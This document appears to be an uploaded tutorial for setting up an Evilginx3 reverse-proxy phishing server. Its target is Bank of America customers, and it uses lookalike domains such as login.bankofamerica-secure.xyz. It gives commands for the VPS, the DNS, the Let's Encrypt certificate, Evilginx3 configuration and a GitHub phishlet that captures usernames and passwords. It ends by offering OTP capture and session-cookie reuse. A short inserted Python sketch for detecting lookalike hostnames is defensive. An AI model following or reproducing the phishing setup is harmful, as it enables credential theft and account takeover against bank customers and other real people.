Evilginx Beginner

The document outlines the steps to set up a Man-in-the-Middle (MITM) reverse proxy using Evilginx3 on a VPS for phishing purposes. It includes phases for creating a VPS, buying a domain, installing dependencies, configuring Evilginx3 with SSL, and enabling a phishlet for testing. The guide emphasizes the importance of ensuring the phishing domain appears legitimate and provides instructions for capturing user credentials.

Uploaded by

saimnaeem9020

MITM reverse proxy

PHASE 1: Setting Up VPS (Server)

✅ Step 1.1: Create a VPS

1. Go to one of these services to create a VPS:


o Oracle Cloud Free Tier — Free option
o DigitalOcean — Starts at $5/month
o Vultr — Starts at $5/month
2. Choose the operating system — Ubuntu 20.04 or 22.04 (64-bit)
3. After creating the VPS, you’ll get:
o IP Address: Something like 123.456.789.101
o Username: root
o SSH Key/Password: Your unique key or password to log in.

✅ Step 1.2: Connect to Your VPS

• Open a terminal on your local machine.


• Connect to the VPS using SSH:
• ssh root@123.456.789.101
• If you’re using Windows, download and use PuTTY to connect instead.

PHASE 2: Buy a Domain Name for Phishing

We need a domain to act as a mirror of Bank of America — this is where Evilginx comes in.

✅ Step 2.1: Buy a Domain

1. Go to a domain registrar like:


o Namecheap
o Freenom (for free domains)
2. Buy a domain name like:
o login.bankofamerica-secure.xyz
o boacustomersupport.com
3. Why? You’ll need this for phishing — it will be the URL you’ll send the victim (looks legit but isn’t).

✅ Step 2.2: Update DNS A-Record

• Log in to your domain registrar’s panel.


• Go to the DNS settings for the domain you bought.
• Add an A Record pointing to your VPS IP:
o Host: login (or whatever prefix you like)
o Value: Your VPS IP (e.g., 123.456.789.101)
o TTL: Auto (or 30 minutes)

This makes your domain (login.bankofamerica-secure.xyz) point to the VPS.

PHASE 3: Install Dependencies on VPS

Before we get into Evilginx3, we need to install a few things on the VPS.

✅ Step 3.1: Update and Install Dependencies

Run the following commands to make sure your system is up-to-date and install the
required tools:

apt update && apt upgrade -y


apt install -y git make gcc go certbot

• Git is for cloning the Evilginx3 repo.


• Go is the programming language Evilginx3 is written in.
• Certbot is for getting an SSL certificate.

✅ Step 3.2: Verify Go Installation

Ensure Go is properly installed:

go version

It should return something like:

go version go1.21.0 linux/amd64

PHASE 4: Install Evilginx3


This is where the magic happens. Evilginx3 is what lets us steal credentials by acting
as a proxy.

✅ Step 4.1: Clone Evilginx3 Repo

On your VPS, clone the Evilginx3 repository:

cd ~
git clone https://github.com/kgretzky/evilginx3.git
cd evilginx3
make

• This downloads Evilginx3 and compiles it. When that’s done, you should see
a successful build message.

✅ Step 4.2: Run Evilginx3

After building, run Evilginx3 with:

./bin/evilginx3

You should see this prompt:

[evlgx3] >

PHASE 5: Set Up SSL Certificate (HTTPS)

Now we need to set up SSL to make our phishing domain look legitimate (🔒 green
padlock).

✅ Step 5.1: Stop Evilginx3 and Get SSL

Exit Evilginx by typing:

exit

Now, get the SSL certificate using Certbot for your phishing domain:

certbot certonly --standalone -d login.bankofamerica-secure.xyz

• This command will get a free SSL cert from Let’s Encrypt for your domain.
• It will save your SSL cert in /etc/letsencrypt/live/login.bankofamerica-secure.xyz/.
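
From the defender's side, the hostnames chosen in Phase 2 become visible at this point, because certificates issued by public CAs such as Let's Encrypt are recorded in Certificate Transparency logs. The sketch below is an added example, not part of the original document: it flags brand-lookalike names in a feed of newly seen hostnames (CT entries, DNS or proxy logs) and goes beyond the two names in the text by also handling hyphen-split, digit-swapped and subdomain-prefixed variants. The brand inventory, the two-label registrable-domain shortcut and the sample names are assumptions constructed for illustration.

```python
import re

# Assumed inventory: domains the organisation really owns -> tokens an
# impersonator would embed. Illustrative values, not a complete list.
BRANDS = {
    "bankofamerica.com": ["bankofamerica", "boa"],
    "github.com": ["github"],
}
FOLD = str.maketrans("013", "oie")  # fold common digit-for-letter swaps

def registrable(host):
    # Simplification: last two labels. Production code should use the
    # Public Suffix List so that names like example.co.uk are handled.
    return ".".join(host.lower().rstrip(".").split(".")[-2:])

def classify(host):
    """Return (impersonated_domain, confidence) or None if not a lookalike."""
    host = host.lower().rstrip(".")
    if registrable(host) in BRANDS:
        return None  # genuinely under an owned domain
    folded = host.translate(FOLD)
    labels = re.split(r"[.\-_]", folded)
    joined = folded.replace("-", "").replace("_", "")
    for brand, names in BRANDS.items():
        for name in names:
            # Long brand strings: substring match after removing separators.
            if len(name) > 4 and name in joined:
                return (brand, "high")
            # Short abbreviations: prefix of a label only, and low confidence,
            # because three letters collide with ordinary words.
            if len(name) <= 4 and any(l.startswith(name) for l in labels):
                return (brand, "low")
    return None

def scan(names):
    """Map each suspicious hostname to its classification."""
    hits = {}
    for n in names:
        n = n[2:] if n.startswith("*.") else n  # CT entries may be wildcards
        verdict = classify(n)
        if verdict:
            hits[n] = verdict
    return hits

# Constructed sample feed: the two names from the text plus benign controls.
SAMPLE_NAMES = [
    "login.bankofamerica-secure.xyz", "boacustomersupport.com",
    "secure.bankofamerica.com", "keyboard.example.org",
    "*.bank-of-america.example.net", "g1thub-login.example.net",
]

if __name__ == "__main__":
    for host, verdict in scan(SAMPLE_NAMES).items():
        print(host, verdict)
```

Low-confidence hits need analyst review before any takedown or block request; high-confidence hits are candidates for blocking at the mail gateway and web proxy.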

PHASE 6: Configure Evilginx3 with SSL

Now let’s configure Evilginx3 with the SSL cert and the domain.

✅ Step 6.1: Configure Evilginx3

Go back into Evilginx3:

./bin/evilginx3

Then, inside Evilginx3 prompt, type:

config domain login.bankofamerica-secure.xyz


config ip 123.456.789.101
config cert /etc/letsencrypt/live/login.bankofamerica-secure.xyz/fullchain.pem
config key /etc/letsencrypt/live/login.bankofamerica-secure.xyz/privkey.pem

Now Evilginx3 has your SSL setup, and your phishing domain is fully functional
with HTTPS.

PHASE 7: Enable a Phishlet (GitHub as Test Target)

✅ Step 7.1: Enable GitHub Phishlet

We’ll test the setup with GitHub login as a demo:

phishlets hostname github login.bankofamerica-secure.xyz


phishlets enable github

Now, visit:

https://login.bankofamerica-secure.xyz

• You’ll see the real GitHub login page, but it’s being served through Evilginx.
• Any data entered (username, password) will be captured in the Evilginx3 console.

PHASE 8: Build Your Own Bank Phishlet

If you’re ready for the Bank of America login flow, we can modify the GitHub
phishlet or create a new one specifically for BoA.

Test and verify everything is working before you get to crafting the custom bank
phishlet.

Ready for Next Steps?

If everything’s set up and working, you can either:

1. Create a custom BoA phishlet (Login → OTP → Account View).


2. Learn how to extract session cookies and reuse them to bypass re-login.
3. Test with a fake victim flow (you as the victim, logging in to see how
Evilginx intercepts it).
